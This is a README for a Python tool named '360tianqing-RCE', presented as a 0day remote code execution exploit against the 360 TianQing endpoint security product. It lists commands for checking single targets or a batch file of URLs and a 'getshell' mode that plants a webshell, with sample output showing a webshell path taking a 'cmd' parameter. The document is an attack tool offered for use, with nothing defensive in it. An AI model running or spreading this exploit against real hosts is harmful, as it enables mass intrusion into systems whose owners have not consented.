360TianQing-RCE

360天擎 0day

• 使用方法(python3.x)

python3 360tianqing-RCE.py -h
  ____    __   ___ _______ _              ____  _             _____   _____ ______
 |___ \  / /  / _ \__   __(_)            / __ \(_)           |  __ \ / ____|  ____|
   __) |/ /_ | | | | | |   _  __ _ _ __ | |  | |_ _ __   __ _| |__) | |    | |__
  |__ <| '_ \| | | | | |  | |/ _` | '_ \| |  | | | '_ \ / _` |  _  /| |    |  __|
  ___) | (_) | |_| | | |  | | (_| | | | | |__| | | | | | (_| | | \ \| |____| |____
 |____/ \___/ \___/  |_|  |_|\__,_|_| |_|\___\_\_|_| |_|\__, |_|  \_\_____|______|
                                                         __/ |
                                                        |___/


                                ---360天擎 rce

usage: 360tianqing-RCE.py [-h] [-u URL] [-f FILE] [-m METHOD]

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target URL; Example:http://ip:port。
  -f FILE, --file FILE  Target File; Example:target.txt。
  -m METHOD, --method METHOD
                        Example: getshell;
                        

python3 360tianqing-RCE.py -u http://127.0.0.1/            	 //检测漏洞

python3 360tianqing-RCE.py -f url.txt							 //批量检测漏洞

python3 360tianqing-RCE.py -u http://127.0.0.1/ -m getshell //获取webshell

python3 360tianqing-RCE.py -f url.txt -m getshell			 //批量获取webshell

• eg：

python 360tianqing-RCE.py -u http://192.168.5.25/

  ____    __   ___ _______ _              ____  _             _____   _____ ______
 |___ \  / /  / _ \__   __(_)            / __ \(_)           |  __ \ / ____|  ____|
   __) |/ /_ | | | | | |   _  __ _ _ __ | |  | |_ _ __   __ _| |__) | |    | |__
  |__ <| '_ \| | | | | |  | |/ _` | '_ \| |  | | | '_ \ / _` |  _  /| |    |  __|
  ___) | (_) | |_| | | |  | | (_| | | | | |__| | | | | | (_| | | \ \| |____| |____
 |____/ \___/ \___/  |_|  |_|\__,_|_| |_|\___\_\_|_| |_|\__, |_|  \_\_____|______|
                                                         __/ |
                                                        |___/


                                ---360天擎 rce

[-]Vulnerability does not exist:http://192.168.5.25/




python 360tianqing-RCE.py -u http://127.0.0.1/

  ____    __   ___ _______ _              ____  _             _____   _____ ______
 |___ \  / /  / _ \__   __(_)            / __ \(_)           |  __ \ / ____|  ____|
   __) |/ /_ | | | | | |   _  __ _ _ __ | |  | |_ _ __   __ _| |__) | |    | |__
  |__ <| '_ \| | | | | |  | |/ _` | '_ \| |  | | | '_ \ / _` |  _  /| |    |  __|
  ___) | (_) | |_| | | |  | | (_| | | | | |__| | | | | | (_| | | \ \| |____| |____
 |____/ \___/ \___/  |_|  |_|\__,_|_| |_|\___\_\_|_| |_|\__, |_|  \_\_____|______|
                                                         __/ |
                                                        |___/


                                ---360天擎 rce

[+]vulnerabilities:http://127.0.0.1/




python 360tianqing-RCE.py -u http://127.0.0.1/ -m getshell

  ____    __   ___ _______ _              ____  _             _____   _____ ______
 |___ \  / /  / _ \__   __(_)            / __ \(_)           |  __ \ / ____|  ____|
   __) |/ /_ | | | | | |   _  __ _ _ __ | |  | |_ _ __   __ _| |__) | |    | |__
  |__ <| '_ \| | | | | |  | |/ _` | '_ \| |  | | | '_ \ / _` |  _  /| |    |  __|
  ___) | (_) | |_| | | |  | | (_| | | | | |__| | | | | | (_| | | \ \| |____| |____
 |____/ \___/ \___/  |_|  |_|\__,_|_| |_|\___\_\_|_| |_|\__, |_|  \_\_____|______|
                                                         __/ |
                                                        |___/


                                ---360天擎 rce

成功获取webshell：http://127.0.0.1//api/Usd3.json?cmd=command